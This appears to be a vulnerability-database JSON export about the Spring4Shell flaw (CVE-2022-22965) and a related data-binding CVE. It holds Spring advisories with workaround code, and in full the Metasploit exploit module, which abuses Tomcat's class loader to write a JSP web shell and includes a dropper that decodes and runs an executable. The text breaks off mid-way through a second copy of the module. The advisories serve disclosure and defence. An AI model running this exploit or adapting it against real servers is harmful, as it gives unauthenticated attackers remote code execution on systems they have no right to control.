server](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#features.developing-web-applications.reactive-server>) are not impacted.\n * `spring-webmvc` or `spring-webflux` dependency.\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions.\n\nAdditional notes:\n\n * The vulnerability involves `ClassLoader` access and depends on the actual Servlet Container in use. 
Tomcat 10.0.19, 9.0.61, 8.5.77, and earlier versions are known to be vulnerable. Payara and Glassfish are also known to be vulnerable. Other Servlet containers may also be vulnerable.\n * The issue relates to data binding used to populate an object from request parameters (either query parameters or form data). Data binding is used for controller method parameters that are annotated with `@ModelAttribute`, or that carry no Spring Web annotation at all.\n * The issue does not relate to `@RequestBody` controller method parameters (e.g. JSON deserialization). However, such methods may still be vulnerable if they have another method parameter populated via data binding from query parameters.\n\n### Status\n\n * Spring Framework 5.3.18 and 5.2.20, which contain the fixes, have been released.\n * Spring Boot 2.6.6 and 2.5.12, which depend on Spring Framework 5.3.18, have been released.\n * [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>) has been published.\n * Apache Tomcat has released versions 10.0.20, 9.0.62, and 8.5.78, which close the attack vector on Tomcat\u2019s side; see [Spring Framework RCE, Mitigation Alternative](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>).\n\n### Suggested Workarounds\n\nThe preferred response is to update to Spring Framework **5.3.18** and **5.2.20** or greater. If you have done this, then no workarounds are necessary. However, some may be in a position where upgrading is not possible to do quickly. For that reason, we have provided some workarounds below.\n\n * Upgrading Tomcat\n * Downgrading to Java 8\n * Disallowed Fields\n\nPlease note that workarounds are not necessarily mutually exclusive, since security is best done \"in depth\".\n\n#### Upgrading Tomcat\n\nFor older applications running on Tomcat with an unsupported Spring Framework version, upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection. 
However, this should be seen as a tactical solution, and the main goal should be to upgrade to a currently supported Spring Framework version as soon as possible. If you take this approach, you should consider setting Disallowed Fields as well for a defense-in-depth approach.\n\n#### Downgrading to Java 8\n\nDowngrading to Java 8 is a viable workaround, if you can neither upgrade the Spring Framework nor upgrade Apache Tomcat. \n\n#### Disallowed Fields\n\nAnother viable workaround is to disable binding to particular fields by setting `disallowedFields` on `WebDataBinder` globally:\n \n \n \n @ControllerAdvice\n @Order(Ordered.LOWEST_PRECEDENCE)\n public class BinderControllerAdvice {\n \n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder) {\n String[] denylist = new String[]{\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"};\n dataBinder.setDisallowedFields(denylist);\n }\n \n }\n \n\nThis works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).\n\nFor example in Spring MVC (and similar in WebFlux):\n \n \n package car.app;\n \n import java.util.ArrayList;\n import java.util.Arrays;\n import java.util.Collections;\n import java.util.List;\n \n import org.springframework.boot.SpringApplication;\n import org.springframework.boot.autoconfigure.SpringBootApplication;\n import org.springframework.boot.autoconfigure.web.servlet.WebMvcRegistrations;\n import org.springframework.context.annotation.Bean;\n import org.springframework.web.bind.ServletRequestDataBinder;\n import org.springframework.web.context.request.NativeWebRequest;\n import org.springframework.web.method.annotation.InitBinderDataBinderFactory;\n import org.springframework.web.method.support.InvocableHandlerMethod;\n import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter;\n import org.springframework.web.servlet.mvc.method.annotation.ServletRequestDataBinderFactory;\n \n \n @SpringBootApplication\n public class MyApp {\n \n \n \tpublic static void main(String[] args) {\n \t\tSpringApplication.run(MyApp.class, args);\n \t}\n \n \n \t// Replace the default RequestMappingHandlerAdapter with one that appends\n \t// the class-related patterns to every binder after all other initialization.\n \t@Bean\n \tpublic WebMvcRegistrations mvcRegistrations() {\n \t\treturn new WebMvcRegistrations() {\n \t\t\t@Override\n \t\t\tpublic RequestMappingHandlerAdapter getRequestMappingHandlerAdapter() {\n \t\t\t\treturn new ExtendedRequestMappingHandlerAdapter();\n \t\t\t}\n \t\t};\n \t}\n \n \n \tprivate static class ExtendedRequestMappingHandlerAdapter extends RequestMappingHandlerAdapter {\n \n \t\t@Override\n \t\tprotected InitBinderDataBinderFactory createDataBinderFactory(List<InvocableHandlerMethod> methods) {\n \n \t\t\treturn new ServletRequestDataBinderFactory(methods, getWebBindingInitializer()) {\n \n \t\t\t\t@Override\n \t\t\t\tprotected ServletRequestDataBinder createBinderInstance(\n \t\t\t\t\t\tObject target, String name, NativeWebRequest request) throws 
Exception {\n \t\t\t\t\t\n \t\t\t\t\tServletRequestDataBinder binder = super.createBinderInstance(target, name, request);\n \t\t\t\t\t// Keep whatever a controller's own @InitBinder already disallowed, then add the class.* patterns\n \t\t\t\t\tString[] fields = binder.getDisallowedFields();\n \t\t\t\t\tList<String> fieldList = new ArrayList<>(fields != null ? Arrays.asList(fields) : Collections.emptyList());\n \t\t\t\t\tfieldList.addAll(Arrays.asList(\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"));\n \t\t\t\t\tbinder.setDisallowedFields(fieldList.toArray(new String[] {}));\n \t\t\t\t\treturn binder;\n \t\t\t\t}\n \t\t\t};\n \t\t}\n \t}\n }\n \n \n\nFor Spring MVC without Spring Boot, an application can switch from `@EnableWebMvc` to extending `DelegatingWebMvcConfiguration` directly, as described in the [Advanced Config](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-config-advanced-java>) section of the documentation, and then override the `createRequestMappingHandlerAdapter` method.\n\n### Misconceptions\n\nThere was speculation surrounding the commit to deprecate `SerializationUtils`. This class has only one usage within the framework and is not exposed to external input. The deprecation is unrelated to this vulnerability.\n\nThere was confusion with a [CVE for Spring Cloud Function](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) which was released just before the report for this vulnerability. 
It is also unrelated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T10:27:00", "type": "spring", "title": "Spring Framework RCE, Early Announcement", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-03-31T10:27:00", "id": "SPRING:DA8F6AA20460EB2D550732A7F74584F6", "href": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T14:58:04", "description": "## Table of Contents\n\n * Overview\n * Does This Affect My Application?\n * Reassessing Your Data Binding Approach\n\n### Overview\n\nWhile investigating the [Spring Framework RCE vulnerability CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and the suggested workaround, we realized that the `disallowedFields` configuration setting on `WebDataBinder` is not intuitive and is not clearly documented. 
We have fixed that but also decided to be on the safe side and announce a follow-up CVE, in order to ensure application developers are alerted and have a chance to review their configuration.\n\n * [CVE-2022-22968: Spring Framework Data Binding Rules Vulnerability](<https://tanzu.vmware.com/security/cve-2022-22968>)\n\nWe have released [Spring Framework 5.3.19 and 5.2.21](<https://spring.io/blog/2022/04/13/spring-framework-5-3-19-and-5-2-21-available-now>) which contain the fix. Spring Boot 2.6.7 and 2.5.13 are scheduled to be released on April 21, 2022.\n\n> Until Spring Boot 2.6.7 and 2.5.13 have been released, you should manually upgrade the Spring Framework dependency in your Spring Boot application. To override the Spring Framework version in your Maven or Gradle build, you should use the `spring-framework.version` property.\n> \n> Please see the documentation for the Spring Boot [Maven plugin](<https://docs.spring.io/spring-boot/docs/current/maven-plugin/reference/htmlsingle/#using.parent-pom>) and [Gradle plugin](<https://docs.spring.io/spring-boot/docs/current/gradle-plugin/reference/htmlsingle/#managing-dependencies.dependency-management-plugin.customizing>) for details.\n\nPrior to the fix in today's releases, the patterns for `disallowedFields` in a `DataBinder` were _case sensitive_ which means a field was not effectively protected unless patterns were registered with both upper and lower case for the first character of the field, including all combinations of upper and lower case for the first character of all nested fields within the property path.\n\nFor example, if you've seen the [Disallowed Fields](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#disallowed-fields>) workaround for the RCE vulnerability, you might have wondered why the disallowed field patterns included seemingly duplicate entries. 
Each pattern had to be registered twice, once with the first character in lowercase, and again with the first character in uppercase. The fix we've released today addresses this by ignoring case when matching against disallowed field patterns. This has the added benefit of disallowing binding to a `firstName` property when the registered pattern is `firstname`. In other words, the changes we've made not only fix the vulnerability reported in the CVE, but they also make disallowed field patterns more robust in general.\n\n### Does This Affect My Application?\n\nThese are the necessary conditions for the specific vulnerability:\n\n * Registration of _disallowed field patterns_ in a `DataBinder`\n * `spring-webmvc` or `spring-webflux` dependency\n * Spring Framework versions 5.3.0 to 5.3.18, 5.2.0 to 5.2.20, and older versions\n\nAdditional notes:\n\n * The issue relates to data binding used to populate an object from request parameters (either query parameters or form data). Data binding is used for controller method parameters that are annotated with `@ModelAttribute` or optionally without it, and without any other Spring Web annotation.\n * The issue does not relate to `@RequestBody` controller method parameters (e.g. JSON deserialization). However, such methods may still be vulnerable if they have another method parameter populated via data binding from query parameters.\n * Your Spring MVC or Spring WebFlux application may be susceptible to data binding issues even if you do not register _disallowed field patterns_. We highly encourage you to review your `DataBinder` configuration and more broadly your approach to data binding. 
For more details, please see the new [Data Binding Model Design](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-ann-initbinder-model-design>) section in the Spring Framework reference manual.\n\n### Reassessing Your Data Binding Approach\n\nIf you're using _disallowed field patterns_ and plan to continue using them, you should definitely update to Spring Framework **5.3.19** and **5.2.21** or greater as soon as possible. \n\nHowever, there are alternatives to relying on _disallowed field patterns_. As discussed in the new [Model Design](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-ann-initbinder-model-design>) section in the reference manual, our recommended approach is to use a _dedicated model object_ that exposes only properties that are relevant for the supported use case. Another alternative is to switch to _allowed field patterns_: instead of supplying a "deny list" via `setDisallowedFields()`, you can supply an explicit "allow list" via `setAllowedFields()` in a `WebDataBinder`.\n\nKeep in mind that it is strongly recommended that you do **not** use types from your domain model such as JPA or Hibernate entities as the model object in data binding scenarios.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T13:00:00", "type": "spring", "title": "Spring Framework Data Binding Rules Vulnerability (CVE-2022-22968)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-04-13T13:00:00", "id": "SPRING:0A31867D9351CED0BD42C5AD9FB90F8C", "href": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-05-16T19:23:58", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.\n", "cvss3": {}, "published": "2022-04-07T13:22:18", "type": "metasploit", "title": "Spring Framework Class property RCE (Spring4Shell)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T13:16:01", "id": "MSF:EXPLOIT/MULTI/HTTP/SPRING_FRAMEWORK_RCE_SPRING4SHELL/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_framework_rce_spring4shell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Retry\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. 
By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page 
import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_truthy(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n 
else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 
'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n 
directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_framework_rce_spring4shell.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-05-18T05:36:06", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. 
This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "osv", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-18T04:18:18", "id": "OSV:GHSA-36P3-WJMG-H94X", "href": "https://osv.dev/vulnerability/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2022-04-08T19:45:16", "description": "Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the 
remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability. Threat analysis of the \u2026\n\n[ Microsoft\u2019s Response to CVE-2022-22965 Spring Framework Read More \u00bb](<https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T23:41:01", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T23:41:01", "id": "MSRC:A49EE2D875C0E490BD326B3CDDB7399F", "href": "https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2022-05-10T17:37:29", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and 
specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdt", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "1337DAY-ID-37692", "href": "https://0day.today/exploit/description/37692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < 
